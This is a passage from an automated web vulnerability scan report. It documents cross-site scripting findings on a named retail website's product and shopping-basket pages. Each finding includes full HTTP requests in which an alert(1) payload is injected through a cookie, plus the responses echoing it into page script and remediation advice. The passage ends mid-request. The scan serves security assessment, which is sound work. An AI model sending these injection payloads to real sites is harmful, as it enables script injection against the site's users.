GET /product.do?baseCode=93260&dataset=11309 HTTP/1.1
Host: ww30.1800baskets.com
Proxy-Connection: keep-alive
Referer: http://ww30.1800baskets.com/template.do?id=template3&page=2000
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=0000MKdbdCo70zXsBXxIys-COzm:-1; ShopperManagerEnterprise=aed35ad7-54a3-48bc-a8e0-0c9f3d76e6184c266'-alert(1)-'ef80968ac09; FSESSIONID=847b741e4593439b8e3ed6040ba46630; brandCode=1001; __utmz=1.1304903358.1.1.utmcsr=ww30.1800flowers.com|utmccn=(referral)|utmcmd=referral|utmcct=/collection.do; __utma=1.534657557.1304903358.1304903358.1304903358.1; __utmc=1; __utmb=1.1.10.1304903358; cmTPSet=Y; CMAVID=70091303843240316067555; 87011923-VID=16601209214853; 87011923-SKEY=6825682268674136395; HumanClickSiteContainerID_87011923=STANDALONE; CoreAt=90074784=1|1|0|0|0|0|0|0|0|0|0|0|1|1304903358|1_|1561_&; cmRS=&t1=1304903358829&t2=1304903368545&t3=1304903441095&lti=1304903441095&ln=&hr=/product.do%3FbaseCode%3D93260%26dataset%3D11309&fti=&fn=searchform%3A0%3BUNDEFINED%3A1%3B&ac=&fd=&uer=&fu=&pi=18B%3Atemplate-The%20Popcorn%20Factory&ho=blooms.1800flowers.com/cm%3F&ci=90074784&ul=http%3A//ww30.1800baskets.com/template.do%3Fid%3Dtemplate3%26page%3D2000&rf=http%3A//ww30.1800flowers.com/collection.do%3Fdataset%3D10305

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 01:19:00 GMT
Server: IBM_HTTP_Server
P3P: CP="CAO DSP COR CURa ADMa DEVa PSAa PSDa IVAa IVDa CONo HISa TELo OUR DELa SAMo UNRo OTRo IND UNI NAV"
Pragma: no-cache
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Vary: Accept-Encoding
X-Powered-By: 1800Flowers web server
X-AspNet-Version: 1.21.366
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Language: en-US
Content-Length: 83754


                                                <html xmlns="http://www.w3.org/1999/xhtml"
    xmlns:og="http://ogp.me/ns#"
    xmlns:fb="http://www.face
...[SNIP]...
<!--

lpAddVars('visitor','VisitorID','aed35ad7-54a3-48bc-a8e0-0c9f3d76e6184c266'-alert(1)-'ef80968ac09');

lpAddVars('page','pageid','product');

//-->
...[SNIP]...

4.201. http://ww30.1800baskets.com/product.do [ShopperManagerEnterprise cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ww30.1800baskets.com
Path:   /product.do

Issue detail

The value of the ShopperManagerEnterprise cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a76bd'-alert(1)-'3d6fc46faa6e9ceca was submitted in the ShopperManagerEnterprise cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /product.do?delDateColl=&personalizable=false&submitForm=&personalComment=&personalCount=&generalProductDataset=11097&hospitalDataset=11096&funeralHomeDataset=11092&ruralRouteDataset=11093&dataset=11309&channel=&landing=&cm_cid=&sku=93260&quantity=1&recipient=-3&international=false&sympathy=false&zipCode=10010&recipientText=&recipient=-3&productType=GPT&locationCode=1&deliveryDate=Friday%2C+May.+20th&deliveryMonth=5&deliveryDay=20&deliveryYear=2011&baseCode=93260&actionEvent=upgrade&flexFlag=false&gptCode=geoSellCode&showAddon=&deliveryDateSelect=&setAlternates=&showAlternates=&contextPageType=PRODUCT&surchargeOnlyOptionId=&flexValue=&flexOptionId=&isGeoSell=false HTTP/1.1
Host: ww30.1800baskets.com
Proxy-Connection: keep-alive
Referer: http://ww30.1800baskets.com/product.do?baseCode=93260&dataset=11309
Cache-Control: max-age=0
Origin: http://ww30.1800baskets.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ShopperManagerEnterprise=aed35ad7-54a3-48bc-a8e0-0c9f3d76e618a76bd'-alert(1)-'3d6fc46faa6e9ceca; FSESSIONID=847b741e4593439b8e3ed6040ba46630; brandCode=1001; __utmz=1.1304903358.1.1.utmcsr=ww30.1800flowers.com|utmccn=(referral)|utmcmd=referral|utmcct=/collection.do; cmTPSet=Y; CMAVID=70091303843240316067555; __unam=bbc31a8-12fd24e67c1-26d7039-1; __utma=1.534657557.1304903358.1304903358.1304903358.1; __utmc=1; __utmb=1.2.10.1304903358; 87011923-VID=16601209214853; 87011923-SKEY=6825682268674136395; HumanClickSiteContainerID_87011923=STANDALONE; JSESSIONID=0000jc-mR2VDw7uBY5v5sZbAO-H:-1; CoreAt=90074784=1|2|0|0|0|0|0|1|0|0|0|0|1|1304903358|1_|1561_&; cmRS=&t1=1304903446336&t2=1304903453532&t3=1304903458838&t4=1304903443093&lti=1304903458838&ln=verify&hr=javascript%3AcheckNSubmit%28false%29&fti=1304903458845&fn=searchform%3A0%3BproductForm%3A1%3Bsigninform%3A2%3Bfindgiftform%3A3%3BUNDEFINED%3A4%3B&ac=1:S&fd=1%3A22%3AlocationCode%3B&uer=&fu=/product.do&pi=PRODUCT%3A%20The%20Popcorn%20Factory%20Party%20Pup%20Snack%20Tin%20%2893260%29&ho=blooms.1800flowers.com/cm%3F&ci=90074784

Response (redirected)

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 01:29:00 GMT
Server: IBM_HTTP_Server
P3P: CP="CAO DSP COR CURa ADMa DEVa PSAa PSDa IVAa IVDa CONo HISa TELo OUR DELa SAMo UNRo OTRo IND UNI NAV"
Pragma: no-cache
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: JSESSIONID=0000XUNWu9J-txAe1nRFBC2FfiX:-1; Path=/
Vary: Accept-Encoding
X-Powered-By: 1800Flowers web server
X-AspNet-Version: 1.21.366
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Language: en-US
Content-Length: 31981


           <html>
<head>

   <meta http-equiv="Pragma" content="no-cache">
   <meta http-equiv="Cache-Control" content="no-cache">
   <meta http-equiv="Expir
...[SNIP]...
<!--

lpAddVars('visitor','VisitorID','aed35ad7-54a3-48bc-a8e0-0c9f3d76e618a76bd'-alert(1)-'3d6fc46faa6e9ceca');

lpAddVars('page','pageid','shoppingbasket');

//-->
...[SNIP]...

4.202. http://ww30.1800baskets.com/shoppingbasket.do [ShopperManagerEnterprise cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ww30.1800baskets.com
Path:   /shoppingbasket.do

Issue detail

The value of the ShopperManagerEnterprise cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c2533'-alert(1)-'2e3adfed67e was submitted in the ShopperManagerEnterprise cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /shoppingbasket.do HTTP/1.1
Host: ww30.1800baskets.com
Proxy-Connection: keep-alive
Referer: http://ww30.1800baskets.com/product.do?baseCode=93260&dataset=11309
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ShopperManagerEnterprise=aed35ad7-54a3-48bc-a8e0-0c9f3d76e618c2533'-alert(1)-'2e3adfed67e; FSESSIONID=847b741e4593439b8e3ed6040ba46630; brandCode=1001; __utmz=1.1304903358.1.1.utmcsr=ww30.1800flowers.com|utmccn=(referral)|utmcmd=referral|utmcct=/collection.do; cmTPSet=Y; CMAVID=70091303843240316067555; __unam=bbc31a8-12fd24e67c1-26d7039-1; __utma=1.534657557.1304903358.1304903358.1304903358.1; __utmc=1; __utmb=1.2.10.1304903358; 87011923-VID=16601209214853; 87011923-SKEY=6825682268674136395; HumanClickSiteContainerID_87011923=STANDALONE; CoreAt=90074784=1|2|0|0|0|0|0|1|0|0|0|0|1|1304903358|1_|1561_&; cmRS=&t1=1304903446336&t2=1304903453532&t3=1304903458838&t4=1304903443093&lti=1304903458838&ln=verify&hr=javascript%3AcheckNSubmit%28false%29&fti=1304903458845&fn=searchform%3A0%3BproductForm%3A1%3Bsigninform%3A2%3Bfindgiftform%3A3%3BUNDEFINED%3A4%3B&ac=1:S&fd=1%3A22%3AlocationCode%3B&uer=&fu=/product.do&pi=PRODUCT%3A%20The%20Popcorn%20Factory%20Party%20Pup%20Snack%20Tin%20%2893260%29&ho=blooms.1800flowers.com/cm%3F&ci=90074784; JSESSIONID=0000a4jGFqAQQsPqkpo4AlBHArV:-1

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 01:20:34 GMT
Server: IBM_HTTP_Server
P3P: CP="CAO DSP COR CURa ADMa DEVa PSAa PSDa IVAa IVDa CONo HISa TELo OUR DELa SAMo UNRo OTRo IND UNI NAV"
Pragma: no-cache
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Vary: Accept-Encoding
X-Powered-By: 1800Flowers web server
X-AspNet-Version: 1.21.366
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Language: en-US
Content-Length: 31975


           <html>
<head>

   <meta http-equiv="Pragma" content="no-cache">
   <meta http-equiv="Cache-Control" content="no-cache">
   <meta http-equiv="Expir
...[SNIP]...
<!--

lpAddVars('visitor','VisitorID','aed35ad7-54a3-48bc-a8e0-0c9f3d76e618c2533'-alert(1)-'2e3adfed67e');

lpAddVars('page','pageid','shoppingbasket');

//-->
...[SNIP]...

4.203. http://ww30.1800baskets.com/shoppingbasket.do [ShopperManagerEnterprise cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ww30.1800baskets.com
Path:   /shoppingbasket.do

Issue detail

The value of the ShopperManagerEnterprise cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f8869'-alert(1)-'6549178ccfff42aec was submitted in the ShopperManagerEnterprise cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /shoppingbasket.do?actionEvent=PayPalCheckout&cartItem%280%29.type=0&cartItem%280%29.itemId=5687d050-633d-4bcd-8079-f1cfa4a09ce8&cartItem%280%29.groupId=0&cartItem%280%29.flexO